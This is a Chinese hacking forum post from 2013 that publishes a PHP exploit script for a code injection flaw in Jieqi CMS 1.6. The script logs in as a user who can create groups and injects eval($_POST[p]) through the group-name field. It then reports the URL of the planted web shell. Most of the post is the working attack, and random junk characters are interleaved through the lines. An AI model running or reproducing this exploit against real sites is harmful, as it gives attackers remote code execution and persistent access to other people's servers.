找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2143|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。2 X- [2 [/ q# J% W6 ^3 Z3 m

0 C: H/ e' n- W$ ]* {, a 4 c/ p) P7 f% h" y: l
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
/ z/ K* s" u: U0 W& G 需要有一个能创建圈子的用户。
% I" D4 c3 m" I$ |
6 d) d) Y# {% k<?php
+ r" j7 K" X7 Z! o/ U 2 r( |* u# ]/ U! X6 H  x# _- N& [
print_r('
) d6 }/ I" _- D- Q* f$ v& Z3 Q+---------------------------------------------------------------------------+: C! m! h! C( p8 u
Jieqi CMS V1.6 PHP Code Injection Exploit
8 ^3 u; w. q% B6 q8 Sby flyh4t
) y% E/ {; `1 n) [& @mail: phpsec at hotmail dot com
- c" J% Y1 G6 K8 _3 |  Y9 ]- vteam: http://www.wolvez.org
/ G9 _3 p& b1 U- [% H6 M+---------------------------------------------------------------------------+
3 r0 x% V* Y5 r, }0 U'); /**
2 v9 L* W& s; Y% \  o+ R# k' W * works regardless of php.ini settings" ]) M- _, N2 m# ?
*/ if ($argc < 5) { print_r('
! @* Y5 J  ?1 E  y+---------------------------------------------------------------------------+
4 M5 i3 ]  H3 `Usage: php '.$argv[0].' host path username
* k& D0 e" e% ~' S8 a( D0 ?host:      target server (ip/hostname)9 k3 Z- H, W9 t5 Y6 |
path:      path to jieqicms
: A0 T9 H# Y5 u: ~% Q4 _uasename:  a username who can create group- P1 F0 e" _8 |! g
Example:
. u4 W9 w# q5 B# y: I  Fphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
' ~/ \1 Z; E7 f+---------------------------------------------------------------------------+" u+ c) U! h+ b  Z, f
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
3 u) i+ ^  E$ J3 X3 q+ P% d5 rContent-Disposition: form-data; name="gname"
. L- y2 A  k: X( A- j7 e/ A
% C0 g( U; m0 v3 `$ \% ?9 C' j: Y! a'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
1 `& ]% e# x, S8 R1 ]-----------------------------23281168279961
, D7 O2 {  l6 v! a7 O- gContent-Disposition: form-data; name="gcatid"1 N$ O8 @# U( \  w: S( f

$ b% W. {9 C% G7 e$ q( B: |& I( ^1. t2 p& X" \+ A0 |4 P
-----------------------------232811682799615 H8 e9 n2 f0 s) M8 U% t7 u3 J
Content-Disposition: form-data; name="gaudit"
$ i! [5 E+ @. ]' e0 F! ^) O! Q ) O2 Q& l2 |+ \% Z4 d" B# K
1
+ X4 ^1 Q* B4 o- e9 v-----------------------------23281168279961
) q9 S! u; [. T- ~$ uContent-Disposition: form-data; name="gbrief"$ q( S* r7 G. q! o

" ~! V$ ?0 O4 f5 m, Z1% [, v7 R; k! L; j
-----------------------------23281168279961--
2 e: B8 W+ O2 q6 U/ X* |'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
5 H; s. }( m* [0 P. z. p0 [" h8 G 3 \& }) ?5 F/ O9 i( _$ y* \
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表